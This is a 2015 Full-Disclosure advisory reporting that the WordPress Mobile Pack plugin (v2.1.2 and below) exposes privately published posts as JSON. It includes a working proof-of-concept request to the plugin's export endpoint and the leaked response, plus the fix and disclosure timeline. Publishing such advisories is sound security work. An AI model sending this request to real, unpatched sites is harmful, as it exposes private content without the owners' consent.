lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sat, 18 Jul 2015 01:52:13 +0000
From: Nitin Venkatesh <venkatesh.nitin@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Information Exposure Vulnerability in WordPress Mobile Pack
 Wordpress Plugin v2.1.2 and below

# Title: Information Exposure Vulnerability in WordPress Mobile Pack
Wordpress Plugin v2.1.2 and below
# Submitter: Nitin Venkatesh
# Product: WordPress Mobile Pack Wordpress Plugin
# Product URL: https://wordpress.org/plugins/wordpress-mobile-pack/
# Vulnerability Type: Information Exposure[CWE-200]
# Affected Versions: v2.1.2 and below. Installed v2.1.3 before June 3, 2015
also affected.
# Tested versions: v2.1.2, v2.1.3 (prior to June 3, 2015)
# Fixed Version: v2.1.3
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1173611/
# Changelog: https://wordpress.org/plugins/wordpress-mobile-pack/changelog/
# CVE Status: None/Unassigned/Fresh

## Product Information:

The NEW WordPress Mobile Pack allows you to 'package' your existing content
into a cross-platform mobile web application.

## Vulnerability Description:

Information Disclosure - Returns the contents of a privately published post
in JSON

## Proof of Concept:

http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticle&callback=exportarticle&articleId=78

### Sample HTTP Request
GET
/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticle&callback=exportarticle&articleId=78
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

### Sample HTTP Response
HTTP/1.1 200 OK
Date: Wed, 03 Jun 2015 00:02:46 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.9
Content-Length: 462
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=UTF-8

exportarticle({"article":{"id":78,"title":"Private
Post!!!","timestamp":1432955820,"author":"admin","date":"Sat, May 30, 2015,
03:17","link":"http:\/\/localhost\/?p=78","image":"","description":"<p>Should
be invisible<\/p>\n","content":"<p>Should be
invisible<\/p>\n","comment_status":"open","no_comments":0,"show_avatars":true,"require_name_email":true,"category_id":1,"category_name":"Uncategorized","related_posts":"","related_web_posts":"","zemanta":false}})

## Solution:

Upgrade to v2.1.3. Users who installed v2.1.3 before June 3, 2015 should
re-download and re-install the package.

## Disclosure Timeline:

2015-06-01 - Discovered. Contacted developer on support forums.
2015-06-03 - Mailed report to developer.
2015-06-03 - Updated v2.1.3 released.
2015-07-18 - Publishing disclosure on FD mailing list.

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists